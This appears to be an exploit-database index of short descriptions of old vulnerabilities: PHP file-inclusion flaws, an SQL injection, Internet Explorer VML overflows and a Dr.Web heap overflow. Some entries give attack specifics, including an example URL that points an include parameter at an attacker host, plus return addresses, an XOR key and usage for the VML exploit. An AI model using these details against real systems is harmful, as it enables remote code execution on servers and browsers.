SolidState version 0.4 is vulnerable to multiple include vulnerabilities. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This will allow the attacker to include arbitrary files from the web server.
ProgSys is vulnerable to a remote file include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code which is then executed on the vulnerable server.
Input passed to the 'GLOBALS[phpQRootDir]' is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
The flaw resides in dix.php3 file that contain this code: include($url_phpartenaire."/config.php3");. An example of the exploit is http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker
This exploit is a stack-based buffer overflow in Microsoft Internet Explorer VML. It uses heap spraying technique to injection shellcode in the heap. It is tested on Windows XP SP1 + IE6 SP1, Windows XP SP0 + IE6, Windows 2000 SP4 + IE6 SP1, and Windows 2000 SP4 + IE6. It is not successful on Windows XP SP2 due to buffer overflow protection.
A remote file inclusion vulnerability exists in PowerNews v1.1.0 due to insufficient sanitization of user-supplied input to the 'nbs' parameter in the 'includes/global.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious URL in the 'nbs' parameter.
This exploit works regardless of php.ini settings against Mysql >= 4.1 (allowing subs) and if 'messages' module is enabled. It allows an attacker to inject malicious SQL queries and disclose administrative credentials.
A vulnerability in AllMyGuests module and standalone version allows remote attackers to include arbitrary files via a URL in the _AMGconfig[cfg_serverpath] parameter to signin.php.
This exploit takes advantage of a heap overflow vulnerability in Dr.Web 4.33 antivirus for Linux. The vulnerability is triggered when scanning a specially crafted LHA file. The exploit uses a NOP sled and shellcode to hijack the GOT entry of realpath() and execute the shellcode.
This exploit is a public version of a 0day exploit for Internet Explorer VML Buffer Overflow Download Exec. It was tested on Windows 2000 Server CN with Internet Explorer 6.0 SP1. It is compiled with cl vml.c and the usage is vml <URL> [htmlfile]. It uses a NOPSIZE of 260, a maximum URL of 60, a DWORD ret of 0x7Ffa4512 for CN and 0x7800CCDD for all Win2k, a search shellcode, a download exec shellcode XOR with 0xee, an HTML header, and an HTML tail.
Services By CQR